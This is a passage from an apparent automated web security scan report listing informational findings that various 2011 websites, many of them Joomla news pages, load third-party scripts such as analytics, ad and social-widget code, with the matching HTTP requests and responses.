Path:	/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.joomlacommunity.eu/www/delivery/spcjs.php?id=1&block=1
http://platform.twitter.com/widgets.js
http://www.google.com/jsapi

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.joomlacommunity.eu/www/delivery/spcjs.php?id=1&block=1"></script>
...[SNIP]...
</div>
   <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>

   <script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...

21.1101. http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlacorner.com
Path:	/joomla-news/608-joomla-16-has-arrived.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://www.google.com/buzz/api/button.js

Request

GET /joomla-news/608-joomla-16-has-arrived.html HTTP/1.1
Host: www.joomlacorner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.16
Set-Cookie: 992260232bef5a730b1bd291176df96d=4a98f8c53f4541210928f4c67e558242; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: ja_anion_tpl=ja_anion; expires=Sat, 14-Jan-2012 15:16:02 GMT; path=/
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 15:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31997

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="th-th" lang="th-th">

...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</script> <script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1102. http://www.joomlainorge.no/nyheter/joomla/552-joomlar-16-er-utgitt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlainorge.no
Path:	/nyheter/joomla/552-joomlar-16-er-utgitt

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /nyheter/joomla/552-joomlar-16-er-utgitt HTTP/1.1
Host: www.joomlainorge.no
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:22 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 536a515975b0bb224c84dbf364570dc5=d25c0652ad8dc304e171cefb60e2e9c9; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:25 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nb-no" lang="nb-no" dir=
...[SNIP]...
<div class="module mod-blank ">

<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

21.1103. http://www.joomlapt.com/comunidade-joomlapt/139-joomla-16-ja-chegou.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlapt.com
Path:	/comunidade-joomlapt/139-joomla-16-ja-chegou.html

Issue detail

The response dynamically includes the following script from another domain:

http://platform.twitter.com/widgets.js

Request

GET /comunidade-joomlapt/139-joomla-16-ja-chegou.html HTTP/1.1
Host: www.joomlapt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1104. http://www.joomlaworks.gr/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlaworks.gr
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.quantserve.com/quant.js

Request

GET / HTTP/1.1
Host: www.joomlaworks.gr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate, max-age=300
Vary: Accept-Encoding
Set-Cookie: 0a45d56f2a275da98a648042c845f6cd=-; path=/
Set-Cookie: mosvisitor=1
Connection: close
Content-Type: text/html
Content-Length: 39827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Conten
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1105. http://www.jt.gen.tr/makaleler/46-joomla-16.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jt.gen.tr
Path:	/makaleler/46-joomla-16.html

Issue detail

The response dynamically includes the following script from another domain:

http://aff3.gittigidiyor.com/affiliate_front.js

Request

GET /makaleler/46-joomla-16.html HTTP/1.1
Host: www.jt.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1106. http://www.kbsp.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kbsp.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://maps.google.com/maps?file=api&v=2&sensor=true&key=ABQIAAAAxCip-gGCAXccz8s_drNA0hQjlO8ejvnFOJwkGC7FWE6SwXx7OhTheCliB7m0cgu436m-QrV81GClBQ

Request

GET / HTTP/1.1
Host: www.kbsp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:04:54 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7l DAV/2 mod_jk/1.2.23 mod_fastcgi/2.4.2 mod_scgi_pubsub/1.11-pubsub mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 02 Dec 2010 20:39:41 GMT
ETag: "97908-80e8-496736bcf5d40"
Accept-Ranges: bytes
Content-Length: 33000
Cache-Control: max-age=60
Expires: Mon, 24 Jan 2011 22:05:54 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</script>

<script src="http://maps.google.com/maps?file=api&v=2&sensor=true&key=ABQIAAAAxCip-gGCAXccz8s_drNA0hQjlO8ejvnFOJwkGC7FWE6SwXx7OhTheCliB7m0cgu436m-QrV81GClBQ" type="text/javascript"></script>
...[SNIP]...

21.1107. http://www.kelvinluck.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kelvinluck.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://stats.wordpress.com/e-201104.js
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/vitch.json?callback=twitterCallback2&count=5

Request

GET / HTTP/1.1
Host: www.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:45 GMT
Server: Apache
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Last-Modified: Tue, 25 Jan 2011 04:35:17 GMT
Vary: Accept-Encoding
Content-Length: 106212
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>The personal webl
...[SNIP]...
</a>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/vitch.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...
<script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

21.1108. http://www.kwitco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kwitco.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s3.chuug.com/chuug.twitthis.scripts/twitthis.js

Request

GET / HTTP/1.1
Host: www.kwitco.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1109. http://www.laptoptips.ca/javascripts/shutter-reloaded/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.laptoptips.ca
Path:	/javascripts/shutter-reloaded/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /javascripts/shutter-reloaded/ HTTP/1.1
Host: www.laptoptips.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:03:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.16
X-Pingback: http://www.laptoptips.ca/wpd/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head profile="http://
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

21.1110. http://www.linkagogo.com/go/AddNoPopup previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.linkagogo.com
Path:	/go/AddNoPopup

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /go/AddNoPopup HTTP/1.1
Host: www.linkagogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:41:52 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b Resin/3.1.4
ETag: "AAAAS27elZo"
Last-Modified: Tue, 25 Jan 2011 04:41:53 GMT
Cache-Control: no-cache
Expires: 0
Content-Length: 16308
Set-Cookie: cookies=Y; path=/
Set-Cookie: user=-1; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Set-Cookie: userName=guest; path=/; expires=Mon, 16-Jan-2012 04:41:52 GMT
Content-Type: text/html; charset=utf-8
Connection: close

<html lang="eng-US">
<head>
<link rel="search" type="application/opensearchdescription+xml" href="/addons/linkagogo_search.xml" title="linkaGoGo favorites search" />
<link rel="search" type="applicati
...[SNIP]...
</table>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.1111. http://www.littlewebthings.com/projects/countdown/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.littlewebthings.com
Path:	/projects/countdown/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13208
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<l
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4b7d83ac7ec1a444"></script>
...[SNIP]...

21.1112. http://www.lynda.com/landing/softwaretraining.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lynda.com
Path:	/landing/softwaretraining.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://lct.salesforce.com/sfga.js

Request

GET /landing/softwaretraining.aspx?AWKeyWord=Joomla!&CourseURL=http%3a%2f%2fwww.lynda.com%2fhome%2fViewCourses.aspx%3flpk0%3d370&Ptitle=Joomla+Tutorials+and+Training+Online&_kk=joomla%20course&_kt=546081e7-492f-4261-b08e-49b0a582fb58/ HTTP/1.1
Host: www.lynda.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1113. http://www.masjo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 44976
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1114. http://www.masjo.com/search/learn+typing+quick+and+easy+crack/page/419/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/search/learn+typing+quick+and+easy+crack/page/419/x22

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /search/learn+typing+quick+and+easy+crack/page/419/x22 HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Content-Length: 63607
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1115. http://www.masjo.com/wp-content/plugins/search-permalink.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.masjo.com
Path:	/wp-content/plugins/search-permalink.php

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /wp-content/plugins/search-permalink.php HTTP/1.1
Host: www.masjo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:07:51 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.masjo.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 00:07:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20127

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1116. http://www.mathias-bank.de/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mathias-bank.de
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.mathias-bank.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1117. http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/Tshirt_Workout/fitness/ab_exercises/136

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /Tshirt_Workout/fitness/ab_exercises/136 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:52 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 1
Cache-Control: max-age=43199
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:44:50 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107104 (MII-APC/1.6)
Connection: close
Content-Length: 45331

<html>
<head>

<title>The T-Shirt Body Workout - Men's Fitness</title>

<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest,
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

21.1118. http://www.mensfitness.com/sports_and_recreation/outdoor_recreation/55 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mensfitness.com
Path:	/sports_and_recreation/outdoor_recreation/55

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://js.adsonar.com/js/adsonar.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js
http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js
http://s7.addthis.com/js/250/addthis_widget.js
http://secure-us.imrworldwide.com/v53.js
http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy

Request

GET /sports_and_recreation/outdoor_recreation/55 HTTP/1.1
Host: www.mensfitness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:47 GMT
Server: Apache/2.2.3 (Red Hat)
Age: 0
Cache-Control: max-age=43200
Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 16:44:47 GMT
Content-Type: text/html; charset=UTF-8
Via: 1.1 mdw107103 (MII-APC/1.6)
Connection: close
Content-Length: 39408

<html>
<head>

<title>Tri This - Men's Fitness</title>

<meta name="Description" content="There's no better way to test your summer fitness than competing in a triathlon.">

<meta name="Keywords" co
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=mfer"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014734126780622100582%3Auhizeh9wkiy"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure-us.imrworldwide.com/v53.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/9242.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js"></script>
...[SNIP]...

21.1119. http://www.metacafe.com/fplayer/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.metacafe.com
Path:	/fplayer/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://s.mcstatic.com/JS/Externals/?v=7879
http://s1.mcstatic.com/JS/Home/?v=7879
http://s4.mcstatic.com/JS/Global/?v=7879

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Tue, 25 Jan 2011 04:45:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=37405ae87945ce0d058ea5e18b5a73df; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=f488ed4f4e9ec6a273b4b088e853dd33; expires=Wed, 25-Jan-2012 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%225ff37793909b485fc44ca3c3af4425f7%22%2C%22LEID%22%3A15%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22pve%22%3A1%7D; expires=Sun, 24-Jan-2016 04:45:05 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3400536236.20480.0000; expires=Tue, 25-Jan-2011 05:45:05 GMT; path=/
Content-Length: 160213

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://s4.mcstatic.com/CSS/Global/?v=7879" /><script type="text/javascript" src="http://s4.mcstatic.com/JS/Global/?v=7879"></script><link type="text/css" rel="stylesheet" href="http://s1.mcstatic.com/CSS/Home/?v=7879" /><script type="text/javascript" src="http://s1.mcstatic.com/JS/Home/?v=7879"></script>
...[SNIP]...

       <script type="text/javascript" src="http://s.mcstatic.com/JS/Externals/?v=7879"></script>
...[SNIP]...

       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.1120. http://www.mindbodygreen.com/passvote.action previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mindbodygreen.com
Path:	/passvote.action

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://platform.twitter.com/anywhere.js?id=uzgchTGVLmPHLMMS074Lw&v=1
http://www.google-analytics.com/urchin.js

Request

GET /passvote.action HTTP/1.1
Host: www.mindbodygreen.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1121. http://www.mister-wong.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mister-wong.com
Path:	/index.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/
http://static.mister-wong.de/mootools-1.2-core-more.js

Request

GET /index.php HTTP/1.1
Host: www.mister-wong.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:46:30 GMT
Server: Apache
Set-Cookie: wongsess=847df68c6b6a1522859025303610eb1c; expires=Fri, 25 Jan 2036 10:46:31 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7516
Connection: close
Content-Type: text/html; charset=UTF-8

